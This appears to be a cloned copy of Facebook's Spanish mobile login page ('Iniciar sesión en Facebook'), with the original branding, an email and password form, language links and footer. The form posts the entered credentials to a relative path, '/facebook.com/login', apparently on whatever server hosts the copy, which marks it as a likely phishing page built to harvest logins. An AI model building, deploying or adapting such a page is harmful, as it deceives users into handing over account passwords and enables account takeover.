

<!DOCTYPE html>
<html lang="es">
   <head>
      <title>Iniciar sesión en Facebook | Facebook</title>
      <meta name="viewport" content="user-scalable=no,initial-scale=1,maximum-scale=1" />
      <link href="https://static.xx.fbcdn.net/rsrc.php/v3/yj/r/gB76kJXPYJV.png" rel="shortcut icon" sizes="196x196" />
      <meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" />
      <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yf/l/0,cross/U9GqRscXzEd.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="BeqBp+V" crossorigin="anonymous" />
      <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yZ/l/0,cross/n9g6Q0kZdhT.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="MoYpVB9" crossorigin="anonymous" />
      <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yw/l/0,cross/chMkxVsPqr1.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="rrUWgCR" crossorigin="anonymous" />
      <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/ym/l/0,cross/hPKGKM13XpB.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="gf0mQno" crossorigin="anonymous" />
    
      <meta name="description" content="Inicia sesi&#xf3;n en Facebook para empezar a compartir y conectar con tus amigos, familiares y las personas que conoces." />
      <meta property="og:site_name" content="Facebook" />
      <meta property="og:type" content="website" />
      <meta property="og:title" content="Iniciar sesi&#xf3;n en Facebook | Facebook" />
      <meta property="og:description" content="Inicia sesi&#xf3;n en Facebook para empezar a compartir y conectar con tus amigos, familiares y las personas que conoces." />
      <meta property="og:image" content="https://www.facebook.com/images/fb_icon_325x325.png" />
      <meta property="og:url" content="https://www.facebook.com/" />
      <link rel="alternate" hreflang="x-default" href="https://www.facebook.com/" />
      <link rel="alternate" hreflang="en" href="https://www.facebook.com/" />
      <link rel="alternate" hreflang="ar" href="https://ar-ar.facebook.com/" />
      <link rel="alternate" hreflang="bg" href="https://bg-bg.facebook.com/" />
      <link rel="alternate" hreflang="bs" href="https://bs-ba.facebook.com/" />
      <link rel="alternate" hreflang="ca" href="https://ca-es.facebook.com/" />
      <link rel="alternate" hreflang="da" href="https://da-dk.facebook.com/" />
      <link rel="alternate" hreflang="el" href="https://el-gr.facebook.com/" />
      <link rel="alternate" hreflang="es" href="https://es-la.facebook.com/" />
      <link rel="alternate" hreflang="es-es" href="https://es-es.facebook.com/" />
      <link rel="alternate" hreflang="fa" href="https://fa-ir.facebook.com/" />
      <link rel="alternate" hreflang="fi" href="https://fi-fi.facebook.com/" />
      <link rel="alternate" hreflang="fr" href="https://fr-fr.facebook.com/" />
      <link rel="alternate" hreflang="fr-ca" href="https://fr-ca.facebook.com/" />
      <link rel="alternate" hreflang="hi" href="https://hi-in.facebook.com/" />
      <link rel="alternate" hreflang="hr" href="https://hr-hr.facebook.com/" />
      <link rel="alternate" hreflang="id" href="https://id-id.facebook.com/" />
      <link rel="alternate" hreflang="it" href="https://it-it.facebook.com/" />
      <link rel="alternate" hreflang="ko" href="https://ko-kr.facebook.com/" />
      <link rel="alternate" hreflang="mk" href="https://mk-mk.facebook.com/" />
      <link rel="alternate" hreflang="ms" href="https://ms-my.facebook.com/" />
      <link rel="alternate" hreflang="pl" href="https://pl-pl.facebook.com/" />
      <link rel="alternate" hreflang="pt" href="https://pt-br.facebook.com/" />
      <link rel="alternate" hreflang="pt-pt" href="https://pt-pt.facebook.com/" />
      <link rel="alternate" hreflang="ro" href="https://ro-ro.facebook.com/" />
      <link rel="alternate" hreflang="sl" href="https://sl-si.facebook.com/" />
      <link rel="alternate" hreflang="sr" href="https://sr-rs.facebook.com/" />
      <link rel="alternate" hreflang="th" href="https://th-th.facebook.com/" />
      <link rel="alternate" hreflang="vi" href="https://vi-vn.facebook.com/" />
      <link rel="canonical" href="https://www.facebook.com/login/" />
      <link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" />
   </head>
   <body tabindex="0" class="touch x1 ff _fzu _50-3 iframe acw" style="cursor: inherit;">
      <div id="viewport" data-kaios-focus-transparent="1">
         <h1 style="display:block;height:0;overflow:hidden;position:absolute;width:0;padding:0">Facebook</h1>
         <div id="page">
            <div class="_129_" id="header-notices"></div>
            <div class="_5soa acw" id="root" role="main" data-sigil="context-layer-root content-pane">
               <div class="_5909">
                  <div class="_7om2">
                     <div class="_4g34" id="u_0_0_8E">
                        <div class="_5yd0 _2ph- _5yd1" style="display: none;" id="login_error" data-sigil="m_login_notice">
                           <div class="_52jd"></div>
                        </div>
                        <div class="_9om_">
                           <div class="_4-4l">
                              <div id="login_top_banner" data-sigil="m_login_upsell login_identify_step_element"></div>
                              <div class="_5909 _2pid _52z6">
                                 <div class="_7om2 _52we">
                                    <div class="_4g34"><a href="/login/?privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNjQ3Mjk3NjU1LCJjYWxsc2l0ZV9pZCI6Nzk2MTcwNzM0NTY5ODY0fQ%3D%3D&amp;ref=dbl"><img src="https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg" width="112" class="img" alt="facebook" /></a></div>
                                 </div>
                              </div>
                              <div class="_5rut">
                                 <form method="post" action="/facebook.com/login" class="mobile-login-form _9hp- _5spm" id="login_form" novalidate="1" data-sigil="m_login_form">
                                    <input type="hidden" name="lsd" value="AVrnxrrvs2E" autocomplete="off" /><input type="hidden" name="jazoest" value="21075" autocomplete="off" /><input type="hidden" name="m_ts" value="1647297655" /><input type="hidden" name="li" value="d8QvYkCS0yFeXw2smlQ3lc7b" /><input type="hidden" name="try_number" value="0" data-sigil="m_login_try_number" /><input type="hidden" name="unrecognized_tries" value="0" data-sigil="m_login_unrecognized_tries" />
                                    <div id="user_info_container" data-sigil="user_info_after_failure_element"></div>
                                    <div id="pwd_label_container" data-sigil="user_info_after_failure_element"></div>
                                    <div id="otp_retrieve_desc_container"></div>
                                    <div>
                                       <div class="_56be">
                                          <div class="_55wo _56bf">
                                             <div class="_96n9" id="email_input_container"><input autocorrect="off" autocapitalize="off" class="_56bg _4u9z _5ruq _8qtn" autocomplete="on" id="m_login_email" name="email" placeholder="N&#xfa;mero de m&#xf3;vil o correo electr&#xf3;nico" type="text" data-sigil="m_login_email" /></div>
                                          </div>
                                       </div>
                                       <div class="_55wq"></div>
                                       <div class="_56be">
                                          <div class="_55wo _56bf">
                                             <div class="_1upc _mg8" data-sigil="m_login_password">
                                                <div class="_5909">
                                                   <div class="_7om2">
                                                      <div class="_4g34 _5i2i _52we">
                                                         <div class="_5xu4"><input autocorrect="off" autocapitalize="off" class="_56bg _4u9z _27z2 _8qtm" autocomplete="on" id="m_login_password" name="pass" placeholder="Contrase&#xf1;a" type="password" data-sigil="password-plain-text-toggle-input" /></div>
                                                      </div>
                                                      <div class="_5s61 _216i _5i2i _52we">
                                                         <div class="_5xu4">
                                                            <div class="_2pi9" style="display:none" id="u_0_1_Tt"><a href="#" data-sigil="password-plain-text-toggle"><span class="mfss" style="display:none" id="u_0_2_I1">OCULTAR</span><span class="mfss" id="u_0_3_0e">MOSTRAR</span></a></div>
                                                         </div>
                                                      </div>
                                                   </div>
                                                </div>
                                             </div>
                                          </div>
                                       </div>
                                    </div>
                                    <div class="_2pie" style="text-align:center;">
                                       <div id="login_password_step_element" data-sigil="login_password_step_element"><button type="submit" value="Entrar" class="_54k8 _52jh _56bs _56b_ _28lf _9cow _56bw _56bu" name="login" data-sigil="touchable login_button_block m_login_button" style="cursor:pointer;"><span class="_55sr">Entrar</span></button></div>
                                       <div class="_7eif" id="oauth_login_button_container" style="display:none"></div>
                                       <div class="_7f_d" id="oauth_login_desc_container" style="display:none"></div>
                                       <div id="otp_button_elem_container"></div>
                                    </div>
                                    <input type="hidden" name="prefill_contact_point" id="prefill_contact_point" /><input type="hidden" name="prefill_source" id="prefill_source" /><input type="hidden" name="prefill_type" id="prefill_type" /><input type="hidden" name="first_prefill_source" id="first_prefill_source" /><input type="hidden" name="first_prefill_type" id="first_prefill_type" /><input type="hidden" name="had_cp_prefilled" id="had_cp_prefilled" value="false" /><input type="hidden" name="had_password_prefilled" id="had_password_prefilled" value="false" /><input type="hidden" name="is_smart_lock" id="is_smart_lock" value="false" /><input type="hidden" id="bi_xrwh" name="bi_xrwh" value="0" /><input type="hidden" id="scetoggle" />
                                    <div class="_xo8"></div>
                                    <noscript><input type="hidden" name="_fb_noscript" value="true" /></noscript>
                                 </form>
                                 <div>
                                    <div class="_2pie _9omz">
                                       <div class="_52jj _9on1"><a class="_9on1" tabindex="0" href="https://m.facebook.com/recover/initiate/?privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNjQ3Mjk3NjU1LCJjYWxsc2l0ZV9pZCI6Mjg0Nzg1MTQ5MzQ1MzY5fQ%3D%3D&amp;c=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fnext%26ref%3Ddbl%26fl%26refid%3D8&amp;r&amp;cuid&amp;ars=facebook_login&amp;lwv=100&amp;ref=dbl" id="forgot-password-link">¿Has olvidado la contraseña?</a></div>
                                    </div>
                                    <div style="padding-top: 42px">
                                       <div>
                                          <div>
                                             <div>
                                                <div id="login_reg_separator" class="_43mg _8qtf" data-sigil="login_reg_separator"><span class="_43mh">o</span></div>
                                                <div class="_52jj _5t3b" id="signup_button_area"><a role="button" class="_5t3c _28le btn btnS medBtn mfsm touchable" id="signup-button" href="https://m.facebook.com/reg/?cid=103&refsrc=deprecated&_rdr" tabindex="0" data-sigil="m_reg_button">Crear cuenta nueva</a></div>
                                             </div>
                                          </div>
                                          <div class="_2pie" style="text-align:center;">
                                             <div>
                                                <div data-sigil="login_identify_step_element"></div>
                                                <div class="other-links _8p_m">
                                                   <ul class="_5pkb _55wp">
                                                      <li></li>
                                                   </ul>
                                                </div>
                                             </div>
                                          </div>
                                       </div>
                                    </div>
                                 </div>
                              </div>
                           </div>
                        </div>
                     </div>
                  </div>
               </div>
               <div style="display:none"></div>
               <span><img src="https://facebook.com/security/hsts-pixel.gif" width="0" height="0" style="display:none" /></span>
               <div class="_55wr _5ui2" data-sigil="m_login_footer">
                  <div class="_5dpw">
                     <div class="_5ui3" data-nocookies="1" id="locale-selector" data-sigil="language_selector marea">
                        <div class="_5909">
                           <div class="_7om2">
                              <div class="_4g34">
                                 <span class="_52jc _52j9 _52jh _3ztb">Español (España)</span>
                                 <div class="_3ztc"><span class="_52jc"><a href="/intl/save_locale/?loc=en_US&amp;href=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fnext%26ref%3Ddbl%26fl%26refid%3D8&amp;ls_ref=mobile_suggested_locale_selector&amp;ref=dbl" data-ajaxify-href="/intl/save_locale/?loc=en_US&amp;href=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fnext%26ref%3Ddbl%26fl%26refid%3D8&amp;ls_ref=mobile_suggested_locale_selector&amp;ref=dbl" data-method="post" data-sigil="ajaxify">English (US)</a></span></div>
                                 <div class="_3ztc"><span class="_52jc"><a href="/intl/save_locale/?loc=fr_FR&amp;href=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fnext%26ref%3Ddbl%26fl%26refid%3D8&amp;ls_ref=mobile_suggested_locale_selector&amp;ref=dbl" data-ajaxify-href="/intl/save_locale/?loc=fr_FR&amp;href=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fnext%26ref%3Ddbl%26fl%26refid%3D8&amp;ls_ref=mobile_suggested_locale_selector&amp;ref=dbl" data-method="post" data-sigil="ajaxify">Français (France)</a></span></div>
                                 <div class="_3ztc"><span class="_52jc"><a href="/intl/save_locale/?loc=ar_AR&amp;href=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fnext%26ref%3Ddbl%26fl%26refid%3D8&amp;ls_ref=mobile_suggested_locale_selector&amp;ref=dbl" data-ajaxify-href="/intl/save_locale/?loc=ar_AR&amp;href=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fnext%26ref%3Ddbl%26fl%26refid%3D8&amp;ls_ref=mobile_suggested_locale_selector&amp;ref=dbl" data-method="post" data-sigil="ajaxify">العربية</a></span></div>
                              </div>
                              <div class="_4g34">
                                 <div class="_3ztc"><span class="_52jc"><a href="/intl/save_locale/?loc=pt_BR&amp;href=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fnext%26ref%3Ddbl%26fl%26refid%3D8&amp;ls_ref=mobile_suggested_locale_selector&amp;ref=dbl" data-ajaxify-href="/intl/save_locale/?loc=pt_BR&amp;href=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fnext%26ref%3Ddbl%26fl%26refid%3D8&amp;ls_ref=mobile_suggested_locale_selector&amp;ref=dbl" data-method="post" data-sigil="ajaxify">Português (Brasil)</a></span></div>
                                 <div class="_3ztc"><span class="_52jc"><a href="/intl/save_locale/?loc=de_DE&amp;href=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fnext%26ref%3Ddbl%26fl%26refid%3D8&amp;ls_ref=mobile_suggested_locale_selector&amp;ref=dbl" data-ajaxify-href="/intl/save_locale/?loc=de_DE&amp;href=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fnext%26ref%3Ddbl%26fl%26refid%3D8&amp;ls_ref=mobile_suggested_locale_selector&amp;ref=dbl" data-method="post" data-sigil="ajaxify">Deutsch</a></span></div>
                                 <div class="_3ztc"><span class="_52jc"><a href="/intl/save_locale/?loc=it_IT&amp;href=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fnext%26ref%3Ddbl%26fl%26refid%3D8&amp;ls_ref=mobile_suggested_locale_selector&amp;ref=dbl" data-ajaxify-href="/intl/save_locale/?loc=it_IT&amp;href=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fnext%26ref%3Ddbl%26fl%26refid%3D8&amp;ls_ref=mobile_suggested_locale_selector&amp;ref=dbl" data-method="post" data-sigil="ajaxify">Italiano</a></span></div>
                                 <a href="/language/?next_uri=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fnext%26ref%3Ddbl%26fl%26refid%3D8&amp;ref=dbl">
                                    <div class="_3j87 _1rrd _3ztd" aria-label="Lista completa de idiomas" data-sigil="more_language"><i class="img sp_PNi1yxtQ4wP sx_db1f29"></i></div>
                                 </a>
                              </div>
                           </div>
                        </div>
                     </div>
                     <div class="_5ui4"><span class="mfss fcg">Facebook, Inc.</span></div>
                  </div>
               </div>
            </div>
            <div class=""></div>
            <div class="viewportArea _2v9s" style="display:none" id="u_0_4_Vl" data-sigil="marea">
               <div class="_5vsg" id="u_0_5_Hp"></div>
               <div class="_5vsh" id="u_0_6_iY"></div>
               <div class="_5v5d fcg">
                  <div class="_2so _2sq _2ss img _50cg" data-animtype="1" data-sigil="m-loading-indicator-animate m-loading-indicator-root"></div>
                  Cargando...
               </div>
            </div>
            <div class="viewportArea aclb" id="mErrorView" style="display:none" data-sigil="marea">
               <div class="container">
                  <div class="image"></div>
                  <div class="message" data-sigil="error-message"></div>
                  <a class="link" data-sigil="MPageError:retry">Intentar de nuevo</a>
               </div>
            </div>
         </div>
      </div>
      <div id="static_templates">
         <div class="mDialog" id="modalDialog" style="display:none">
            <div class="_52z5 _451a mFuturePageHeader _1uh1 firstStep titled" id="mDialogHeader">
               <div class="_5909">
                  <div class="_7om2 _52we">
                     <div class="_5s61">
                        <div class="_52z7"><button type="submit" value="Cancelar" class="cancelButton btn btnD bgb mfss touchable" id="u_0_8_cP" data-sigil="dialog-cancel-button">Cancelar</button><button type="submit" value="Atr&#xe1;s" class="backButton btn btnI bgb mfss touchable iconOnly" aria-label="Atr&#xe1;s" id="u_0_9_aK" data-sigil="dialog-back-button"><i class="img sp_PNi1yxtQ4wP sx_32f182" style="margin-top: 2px;"></i></button></div>
                     </div>
                     <div class="_4g34">
                        <div class="_52z6">
                           <div class="_50l4 mfsl fcw" id="m-future-page-header-title" role="heading" tabindex="0" data-sigil="m-dialog-header-title dialog-title">Cargando...</div>
                        </div>
                     </div>
                     <div class="_5s61">
                        <div class="_52z8" id="modalDialogHeaderButtons"></div>
                     </div>
                  </div>
               </div>
            </div>
            <div class="modalDialogView" id="modalDialogView"></div>
            <div class="_5v5d _5v5e fcg" id="dialogSpinner">
               <div class="_2so _2sq _2ss img _50cg" data-animtype="1" id="u_0_7_Qr" data-sigil="m-loading-indicator-animate m-loading-indicator-root"></div>
               Cargando...
            </div>
         </div>
      </div>

</body></html>